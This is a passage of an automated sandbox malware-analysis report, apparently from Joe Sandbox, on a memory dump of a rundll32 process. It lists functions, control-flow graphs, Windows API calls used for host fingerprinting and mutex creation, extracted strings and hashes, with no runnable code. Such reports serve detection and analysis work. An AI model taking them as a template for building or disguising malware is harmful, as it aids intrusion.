5806->5812 5807->5805 5811->5801 5812->5804 5844->5844 5845 7f3ac2ed-7f3ac328 call 7f37caa0 5844->5845 5845->5774
                      APIs
                      • GetAdaptersInfo.IPHLPAPI(?,?), ref: 7F3AB687
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: AdaptersInfo
                      • String ID:
                      • API String ID: 3177971545-0
                      • Opcode ID: ecb3703bfb739008ff5fb2f425c5b1f38e4bf5323afb318f6fced1f23a85cefe
                      • Instruction ID: caf8f1732e4252a592c52b3d78b642df55afad85f99b5067842a461feeab6cbf
                      • Opcode Fuzzy Hash: ecb3703bfb739008ff5fb2f425c5b1f38e4bf5323afb318f6fced1f23a85cefe
                      • Instruction Fuzzy Hash: 14A2BE74E052698FCB68CF59C894BEDBBB1BF89304F1081DAD849A7355DB31AA81CF50
                      Function 7F396330 Relevance: 2.2, Strings: 1, Instructions: 908COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 5847 7f396330-7f3963f2 call 7f352f60 call 7f3852a0 call 7f37ceb0 call 7f394d40 call 7f34a1a0 5859 7f3963fd 5847->5859 5860 7f3963f4-7f3963fb 5847->5860 5861 7f396404-7f39640a 5859->5861 5860->5861 5862 7f396538-7f396597 call 7f37b900 * 4 call 7f3345e0 call 7f3bb470 5861->5862 5863 7f396410-7f396436 call 7f3b0b80 call 7f3344c0 5861->5863 5891 7f39659d-7f3966ad call 7f3463a0 call 7f3345e0 call 7f34a670 call 7f33d200 call 7f384610 call 7f37aea0 call 7f394b90 call 7f333170 call 7f3345e0 call 7f34a670 call 7f349d60 call 7f37b900 5862->5891 5892 7f3966b2-7f396722 call 7f392690 call 7f37aea0 call 7f394b90 call 7f333000 5862->5892 5872 7f39643c-7f39652e call 7f3463a0 call 7f34acc0 call 7f33d200 call 7f384610 call 7f37aea0 call 7f394b90 call 7f333170 call 7f34acc0 call 7f349d60 call 7f37b900 5863->5872 5873 7f396533 5863->5873 5872->5873 5873->5862 5891->5892 5919 7f396728-7f396738 5892->5919 5919->5919 5922 7f39673a-7f396824 call 7f335370 call 7f37b900 call 7f3348e0 call 7f349e20 call 7f37b900 call 7f3463a0 * 3 call 7f3b4560 5919->5922 5955 7f396829-7f396849 5922->5955 5956 7f39684b-7f39688f call 7f34c260 call 7f384ce0 call 7f37aea0 call 7f341d00 5955->5956 5957 7f396895-7f39690e call 7f3463a0 * 2 call 7f333000 5955->5957 5956->5957 5978 7f39710d-7f3971bf call 7f3463a0 * 2 call 7f385fa0 call 7f37b900 * 4 call 7f37ca10 call 7f386350 call 7f37b900 5956->5978 5971 7f396914-7f396924 5957->5971 5971->5971 5973 7f396926-7f396997 call 7f335370 call 7f3b4560 5971->5973 5981 7f396999-7f3969dd call 7f351990 call 7f384c20 call 7f37aea0 call 7f341d00 5973->5981 5982 7f3969e3-7f396a55 call 7f3463a0 * 2 call 7f333000 5973->5982 6043 7f3971c2-7f3971cf 5978->6043 5981->5982 6015 7f397044-7f397108 call 7f3463a0 * 2 call 7f385fa0 call 7f37b900 * 5 call 7f37ca10 call 7f386350 call 7f37b900 5981->6015 6003 7f396a5b-7f396a6b 5982->6003 6003->6003 6006 7f396a6d-7f396adb call 7f335370 call 7f3b4560 6003->6006 6021 7f396add-7f396b21 call 7f34d450 call 7f384e20 call 7f37aea0 call 7f341d00 6006->6021 6022 7f396b27-7f396ba6 call 7f3463a0 * 2 call 7f333000 6006->6022 6015->6043 6021->6022 6060 7f396f6c-7f39703f call 7f3463a0 * 2 call 7f385fa0 call 7f37b900 * 6 call 7f37ca10 call 7f386350 call 7f37b900 6021->6060 6049 7f396bac-7f396bbc 6022->6049 6049->6049 6052 7f396bbe-7f396c32 call 7f335370 call 7f3b4560 6049->6052 6065 7f396c34-7f396c81 call 7f34eb70 call 7f384e60 call 7f37aea0 call 7f341d00 6052->6065 6066 7f396c87-7f396cce GetPEB 6052->6066 6060->6043 6065->6066 6100 7f396e85-7f396f67 call 7f3463a0 * 2 call 7f385fa0 call 7f37b900 * 7 call 7f37ca10 call 7f386350 call 7f37b900 6065->6100 6071 7f396cd1-7f396d2c 6066->6071 6072 7f396d3a 6071->6072 6073 7f396d2e-7f396d38 6071->6073 6078 7f396d44-7f396d53 6072->6078 6073->6078 6082 7f396d59-7f396d5f 6078->6082 6083 7f396e3c-7f396e66 6078->6083 6087 7f396d62-7f396d7b 6082->6087 6083->6071 6090 7f396e6c 6083->6090 6087->6083 6092 7f396d81-7f396da2 6087->6092 6095 7f396e76-7f396e7e 6090->6095 6097 7f396da9-7f396dc0 6092->6097 6095->6100 6102 7f396dcd-7f396dde 6097->6102 6103 7f396dc2-7f396dea 6097->6103 6100->6043 6102->6097 6110 7f396dec-7f396e35 6103->6110 6111 7f396e37 6103->6111 6110->6095 6111->6087
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: "
                      • API String ID: 0-123907689
                      • Opcode ID: 0dbefd3ca178467561b08a9fafa7990dc7198fc67fdee4f62e4b777fcb4c96e5
                      • Instruction ID: 29316be6804f7f483f9bbf53ccd85200dd14e25a836f968330f39e538b62b193
                      • Opcode Fuzzy Hash: 0dbefd3ca178467561b08a9fafa7990dc7198fc67fdee4f62e4b777fcb4c96e5
                      • Instruction Fuzzy Hash: 15A230B0D0125CDBCB15DFA8C990BEEBBB4AF49304F1081D9D459A7281EB346B85CFA1
                      Function 7F3AAF80 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 6149 7f3aaf80-7f3aafba GetPEB 6150 7f3aafbd-7f3ab006 6149->6150 6151 7f3ab008-7f3ab00f 6150->6151 6152 7f3ab011 6150->6152 6153 7f3ab018-7f3ab024 6151->6153 6152->6153 6154 7f3ab02a-7f3ab030 6153->6154 6155 7f3ab0e6-7f3ab104 6153->6155 6157 7f3ab033-7f3ab046 6154->6157 6155->6150 6156 7f3ab10a 6155->6156 6158 7f3ab111-7f3ab129 GetSystemInfo 6156->6158 6157->6155 6159 7f3ab04c-7f3ab067 6157->6159 6160 7f3ab06e-7f3ab085 6159->6160 6161 7f3ab08f-7f3ab0a0 6160->6161 6162 7f3ab087-7f3ab0a9 6160->6162 6161->6160 6164 7f3ab0ab-7f3ab0df 6162->6164 6165 7f3ab0e1 6162->6165 6164->6158 6165->6157
                      APIs
                      • GetSystemInfo.KERNEL32(?), ref: 7F3AB117
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoSystem
                      • String ID:
                      • API String ID: 31276548-0
                      • Opcode ID: 0799e872704a2c02d3917b2289854fd93e3ac26d7fb6a869771213d8eff4452c
                      • Instruction ID: e1f0826a4ef11217652a482d7c762d0351881663090e673a563ae1b4f2a16959
                      • Opcode Fuzzy Hash: 0799e872704a2c02d3917b2289854fd93e3ac26d7fb6a869771213d8eff4452c
                      • Instruction Fuzzy Hash: CE619E78E042599FCB08CF99C590AEDFBB1FF48304F24819AE815AB345D735AA41CF90
                      Function 7F35BAE5 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 241memorysynchronizationCOMMON
                      Download Yara Rule
                      APIs
                      • CreateMutexA.KERNEL32(00000000,00000001,?,?,?,A819E2D1,000CB52E), ref: 7F35BAF4
                      • GetProcessHeap.KERNEL32(FFFFB705,00000000,000000A8,00000000), ref: 7F35BB15
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateHeapMutexProcess
                      • String ID: tFailedtoaddbootent
                      • API String ID: 2384059268-1493962688
                      • Opcode ID: 219576b5c1ec34872ecc05fc67d39be6f4f89fa3d6ac72da8df19dc5cae68f19
                      • Instruction ID: 215a402db50eb7f0ea1ddb30172beef6bfa6a5d751e7301972cf3f4230a60256
                      • Opcode Fuzzy Hash: 219576b5c1ec34872ecc05fc67d39be6f4f89fa3d6ac72da8df19dc5cae68f19
                      • Instruction Fuzzy Hash: 72C18E7AD04264DFDB14CF7AC8907ADBFF1AB88325F28819AD449A7345D7349990CF60

                      Non-executed Functions

                      Function 7F397510 Relevance: 18.0, APIs: 1, Strings: 10, Instructions: 1540stringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlenW.KERNEL32(?,?,?,?,?,00000065,?,?,65004400,43CBB420,00000000,FFFFB705,00000000,?,00000000,08A8B478), ref: 7F39867B
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrlen
                      • String ID: 4A$,;T*$<$C$Exceptionencounter$SOFTWARE/Microsoft$Y$e$g$tFailedtoaddbootent
                      • API String ID: 1659193697-3795500999
                      • Opcode ID: a4a7e43eb00b580fe25853d449e7b02820e078a06d9bf132bb6718cb575b362c
                      • Instruction ID: dc0bac28e059059e99e571a3929f6276109dce9f2a1a8ae393c93b4006cd53f4
                      • Opcode Fuzzy Hash: a4a7e43eb00b580fe25853d449e7b02820e078a06d9bf132bb6718cb575b362c
                      • Instruction Fuzzy Hash: 50F2D17A9052A4DFDB04CFAAC5907BEBFF1BB99325F28819ED445A7246D3348950CF20
                      Function 7F35ED38 Relevance: 15.0, APIs: 4, Strings: 4, Instructions: 1012windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: Menu$ErrorFocusLastMessageWow64
                      • String ID: 4A$advapi32$m$tFailedtoaddbootent
                      • API String ID: 1239082975-1105196973
                      • Opcode ID: d6c0db44f48c6390a5a206c492346c5d78b89c8fc00d728f7169d75a9a0b0fc4
                      • Instruction ID: 4dc50b432723dad0ae2f4ae843261e2a837600f48e5de2e4afe9b03a4199f9f9
                      • Opcode Fuzzy Hash: d6c0db44f48c6390a5a206c492346c5d78b89c8fc00d728f7169d75a9a0b0fc4
                      • Instruction Fuzzy Hash: 19B27E7AD04268DFDB14CF6AC9807ADBFF5FB88320F28815AD449A7245D7349A91CF60
                      Function 7F39AFC0 Relevance: 13.8, APIs: 4, Strings: 3, Instructions: 1571COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 4A$!$4N
                      • API String ID: 0-1607115507
                      • Opcode ID: b6bc480252da4cc129dfbe1eb8be932fa77bc414fde70d8e4397991929fe728d
                      • Instruction ID: 65dca0d4e7cfc2cddc22c5e4b0f7b5c006dab7af42cc8ee7c0b4e5f00bf11dc5
                      • Opcode Fuzzy Hash: b6bc480252da4cc129dfbe1eb8be932fa77bc414fde70d8e4397991929fe728d
                      • Instruction Fuzzy Hash: BEF28C7AD04268DBDB14CFAAC9807ADBFF5FF48314F28815AE449A7245D7349A90CF24
                      Function 7F36C27E Relevance: 13.2, APIs: 4, Strings: 3, Instructions: 976COMMON
                      Download Yara Rule
                      APIs
                      • GetCursor.USER32(80BD08A8,?,?,?,?,?,00000000,?,?,?,87783EA4,FFFFFFFF,?,?,95A17443,000CD5DA), ref: 7F36C57E
                      • GetCursorPos.USER32(00000000), ref: 7F36C5A4
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: Cursor
                      • String ID: 4A$Exceptionencounter$tFailedtoaddbootent
                      • API String ID: 3268636600-671415319
                      • Opcode ID: 2eb50a764f34aa0a0ccf570545d8f5d65bfaceb74b468e1ad84ca746b4cd7ec5
                      • Instruction ID: 4b4b3f49fc2ed8dfc4ce4930310d47bb6c894f883d6702c87c31d22bf7fdc7ff
                      • Opcode Fuzzy Hash: 2eb50a764f34aa0a0ccf570545d8f5d65bfaceb74b468e1ad84ca746b4cd7ec5
                      • Instruction Fuzzy Hash: D7A2AF7A904264DBDB14CF6AC8907ADBFF5FB48321F28815EE449A7249D7389990CF24
                      Function 7F39CC60 Relevance: 12.6, APIs: 1, Strings: 5, Instructions: 2126COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 4A$K6$W}$Z$tFailedtoaddbootent
                      • API String ID: 0-1680128509
                      • Opcode ID: 4e3861153642b6bb915412dfd1e5ffb687e97a9f2e3829ee9f497f342f574344
                      • Instruction ID: 326d309edb4b81cf60ea6ca096e3349cad01da26c984841ac091ae7c97f13142
                      • Opcode Fuzzy Hash: 4e3861153642b6bb915412dfd1e5ffb687e97a9f2e3829ee9f497f342f574344
                      • Instruction Fuzzy Hash: B823B17A908264DBDB04CFAAC4907BEBFF1BF59315F28815ED445A7246D3388A90CF64
                      Function 7F36C426 Relevance: 11.4, APIs: 4, Strings: 2, Instructions: 894COMMON
                      Download Yara Rule
                      APIs
                      • GetCursor.USER32(80BD08A8,?,?,?,?,?,00000000,?,?,?,87783EA4,FFFFFFFF,?,?,95A17443,000CD5DA), ref: 7F36C57E
                      • GetCursorPos.USER32(00000000), ref: 7F36C5A4
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: Cursor
                      • String ID: 4A$Exceptionencounter
                      • API String ID: 3268636600-279345641
                      • Opcode ID: 1dafcf2ec2213fa83325a564b9f47ed652ee5abc1df33bb3c5952c575aaf0139
                      • Instruction ID: af1f4c3154f8ce9c9bb5fe7d5425ce57978f92880912b9f86b4ec8a5f9d3602b
                      • Opcode Fuzzy Hash: 1dafcf2ec2213fa83325a564b9f47ed652ee5abc1df33bb3c5952c575aaf0139
                      • Instruction Fuzzy Hash: DE82D17A904264DBDB14CF6AC8907BDBFF5FB48321F28815EE449A7249D7389990CF24
                      Function 7F36C44C Relevance: 11.4, APIs: 4, Strings: 2, Instructions: 892COMMON
                      Download Yara Rule
                      APIs
                      • GetCursor.USER32(80BD08A8,?,?,?,?,?,00000000,?,?,?,87783EA4,FFFFFFFF,?,?,95A17443,000CD5DA), ref: 7F36C57E
                      • GetCursorPos.USER32(00000000), ref: 7F36C5A4
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: Cursor
                      • String ID: 4A$Exceptionencounter
                      • API String ID: 3268636600-279345641
                      • Opcode ID: a5216ba28e2387216a676226b5a0c840c00acdbb550bf16db6976c018f95c89a
                      • Instruction ID: c9996b2eb54559aff12b456feaa21ec94b6143244c58b6b7f00fbf1d549e175f
                      • Opcode Fuzzy Hash: a5216ba28e2387216a676226b5a0c840c00acdbb550bf16db6976c018f95c89a
                      • Instruction Fuzzy Hash: 7882C17A904264DBDB14CF6AC8907BDBFF5FB48321F28815EE449A7249D7389990CF24
                      Function 7F36C448 Relevance: 11.4, APIs: 4, Strings: 2, Instructions: 892COMMON
                      Download Yara Rule
                      APIs
                      • GetCursor.USER32(80BD08A8,?,?,?,?,?,00000000,?,?,?,87783EA4,FFFFFFFF,?,?,95A17443,000CD5DA), ref: 7F36C57E
                      • GetCursorPos.USER32(00000000), ref: 7F36C5A4
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: Cursor
                      • String ID: 4A$Exceptionencounter
                      • API String ID: 3268636600-279345641
                      • Opcode ID: 063464e23a62462635c0a6ae56b714c6e9c3c33d7664351d0c741eb7b42e9b00
                      • Instruction ID: d6dd60f8228abcf1e831b9b6b95fa313a9cbb1f53f088a8753c072773c82e8f9
                      • Opcode Fuzzy Hash: 063464e23a62462635c0a6ae56b714c6e9c3c33d7664351d0c741eb7b42e9b00
                      • Instruction Fuzzy Hash: CA82C17A904264DBDB14CF6AC8907BDBFF5FB48321F28815EE449A7249D7389990CF24
                      Function 7F35A430 Relevance: 11.2, APIs: 3, Strings: 3, Instructions: 692COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: CtrlShellWindow
                      • String ID: 4A$r$tFailedtoaddbootent
                      • API String ID: 3408278428-993686396
                      • Opcode ID: 57ab2bcd133cde0561316f203dde3802984220dfe7b8a971ffadea1b7006a264
                      • Instruction ID: 40810b596631e57c33d3e3625454cef5178c7d08a4c3962a9192a4602f6499f1
                      • Opcode Fuzzy Hash: 57ab2bcd133cde0561316f203dde3802984220dfe7b8a971ffadea1b7006a264
                      • Instruction Fuzzy Hash: D1725A79D04228DFDB14CFAAC890BADBFF1FB88315F28819AD459A7245D7349990CF60
                      Function 7F3ECAEF Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: __floor_pentium4
                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                      • API String ID: 4168288129-2761157908
                      • Opcode ID: b9fbecceb1a45b8d470314acba482905716daabce5a3ac6351e6ca45c2f71baa
                      • Instruction ID: 62dafd252e4c8569ca424cf004473a38275398fffad36a67aaca4f5cb45d1844
                      • Opcode Fuzzy Hash: b9fbecceb1a45b8d470314acba482905716daabce5a3ac6351e6ca45c2f71baa
                      • Instruction Fuzzy Hash: 54D21872E082298FDB65CE28DD407DAB7B9EF44345F1845EAD84EE7240E774AE818F41
                      Function 7F368670 Relevance: 9.7, Strings: 7, Instructions: 959COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 9$>$I$O$b$o$y
                      • API String ID: 0-3731792213
                      • Opcode ID: 9a430c28b8f7df6faf1d4f42c1249c6211a7db09875ad2b99699aa108386b977
                      • Instruction ID: 960df6ee4cfa282fcdddfe4e7fa2ad52dc688afe56cc19c8f6c382c8cb0d4562
                      • Opcode Fuzzy Hash: 9a430c28b8f7df6faf1d4f42c1249c6211a7db09875ad2b99699aa108386b977
                      • Instruction Fuzzy Hash: 94A20234A152688BDB25CF64D844BEEB7B2EF98300F1080E9D40DAB394EB755E85CF56
                      Function 7F364128 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 684COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: B$TD$X$tFailedtoaddbootent
                      • API String ID: 0-2568232824
                      • Opcode ID: ea1696d0acd4ae44c3004623fc907b8715efcfb0a01d4eb5dbe5e0c056a1960e
                      • Instruction ID: be9c1a7621e32f2adc80068228f5c8b642d1b7aad1d244346089573c8c27abd5
                      • Opcode Fuzzy Hash: ea1696d0acd4ae44c3004623fc907b8715efcfb0a01d4eb5dbe5e0c056a1960e
                      • Instruction Fuzzy Hash: E4728E79D05268DFDB18CFAAC8907ADBFB1BB49310F2881AED409A7345D7349990CF24
                      Function 7F3BFFE0 Relevance: 9.2, Strings: 7, Instructions: 484COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 4A$2$5$<$T$j$p
                      • API String ID: 0-942779811
                      • Opcode ID: 4b869aab6150dc565ec419bf07ad8c13955c513777d74ca16a798a48d5da8bfa
                      • Instruction ID: 57a6fa78470e4886f7809e6ca0e27dfd6a5d4d6ad27ffb56db357efa1c3b8c01
                      • Opcode Fuzzy Hash: 4b869aab6150dc565ec419bf07ad8c13955c513777d74ca16a798a48d5da8bfa
                      • Instruction Fuzzy Hash: B132AD79D05268DFDB14CF6AC8507AEBFB2BF49315F288199E449A7381D7348A80CF60
                      Function 7F36693B Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 450COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 4A
                      • API String ID: 0-1298712752
                      • Opcode ID: 0e9ad950f0d9509f06973ff1d508df09ba2f10081385ceb13f302d5daf43404c
                      • Instruction ID: aa685809fa94bb5091c981bebbb73da806c351972c364b9703cf22d2d5418fa8
                      • Opcode Fuzzy Hash: 0e9ad950f0d9509f06973ff1d508df09ba2f10081385ceb13f302d5daf43404c
                      • Instruction Fuzzy Hash: D7226C75D04628DFDB14CF6AC9907AEBFF1FB48315F24819AE409AB249D7349A91CF20
                      Function 7F3EAF2B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetLocaleInfoW.KERNEL32(?,2000000B,7F3EB249,00000002,00000000,?,?,?,7F3EB249,?,00000000), ref: 7F3EAFC4
                      • GetLocaleInfoW.KERNEL32(?,20001004,7F3EB249,00000002,00000000,?,?,?,7F3EB249,?,00000000), ref: 7F3EAFED
                      • GetACP.KERNEL32(?,?,7F3EB249,?,00000000), ref: 7F3EB002
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoLocale
                      • String ID: ACP$OCP
                      • API String ID: 2299586839-711371036
                      • Opcode ID: 84bdc92c2e19e13e2da16d08e3050d0e2a33be408ce97664c7687e046abbd2e4
                      • Instruction ID: b56236484050ed994f3626a33766ce8ed58c91f50295241fa94f4b3980ce2f20
                      • Opcode Fuzzy Hash: 84bdc92c2e19e13e2da16d08e3050d0e2a33be408ce97664c7687e046abbd2e4
                      • Instruction Fuzzy Hash: 7D21A7A6610321AADB169B28CD00BC776BBAF54E65B168658F52BDB104E732FD42C350
                      Function 7F36CC31 Relevance: 8.0, APIs: 2, Strings: 3, Instructions: 530stringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlenW.KERNEL32(?,?,?,-D4A73215,43CBB325), ref: 7F36CD3C
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrlen
                      • String ID: Exceptionencounter$b$tFailedtoaddbootent
                      • API String ID: 1659193697-899374484
                      • Opcode ID: bbbbba643153856199f5e7a5c9b6641b083c95ea48e9b74485f034cc7c45e882
                      • Instruction ID: 7fc59e7dfdf47cf6387a4c2ff22206eabe25d332bf63d967b4f7b0ade54c4243
                      • Opcode Fuzzy Hash: bbbbba643153856199f5e7a5c9b6641b083c95ea48e9b74485f034cc7c45e882
                      • Instruction Fuzzy Hash: FC32D37A908264DFDB04CF6AC8507ADBFF2FB48325F28815ED449A7249D33499A1CF24
                      Function 7F364A3B Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: TD$X$q
                      • API String ID: 0-280752806
                      • Opcode ID: 622147ca26d7671637468828ab3207be82aa560e53017e802138c3abf55d3786
                      • Instruction ID: 12a5ad2bfa7bfe78bdce102d8ae44f1c122ae973fc841330bf41214a38088455
                      • Opcode Fuzzy Hash: 622147ca26d7671637468828ab3207be82aa560e53017e802138c3abf55d3786
                      • Instruction Fuzzy Hash: 1F027E79D05268DFDB18CFAAC8907ADBFF5BF48321F28819AD409A7245D7349990CF60
                      Function 7F3EA79C Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetACP.KERNEL32(?,?,?,?,?,?,7F3E2DE2,?,?,?,00000055,?,-00000050,?,?,00000001), ref: 7F3EA85D
                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,7F3E2DE2,?,?,?,00000055,?,-00000050,?,?), ref: 7F3EA888
                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 7F3EA9EB
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: CodeInfoLocalePageValid
                      • String ID: utf8
                      • API String ID: 790303815-905460609
                      • Opcode ID: cccef503722a8d9e45c7a214aed7a2ae9f382ac41fe865cce8a508f8d08601f2
                      • Instruction ID: dbf21f03318db62d7a92050db1c495f588a1fa42df0eef00fa0919b600e30b46
                      • Opcode Fuzzy Hash: cccef503722a8d9e45c7a214aed7a2ae9f382ac41fe865cce8a508f8d08601f2
                      • Instruction Fuzzy Hash: B571E272A0032AAAEF15AB75CC41BAB77FCEF45310F11452AF526DB180EB70E9428760
                      Function 7F35DA02 Relevance: 6.8, APIs: 1, Strings: 3, Instructions: 769COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 4A$Windows::Compat::A$tFailedtoaddbootent
                      • API String ID: 0-1618564604
                      • Opcode ID: 9ec5509ec293f19a259fbaf35df23025227bdf422f98f6edbc8c5674f992334c
                      • Instruction ID: af86cd618f31adf11c4ad8c22e2f08ec6ce2c1b8bb0bd86309618d1e78ddd628
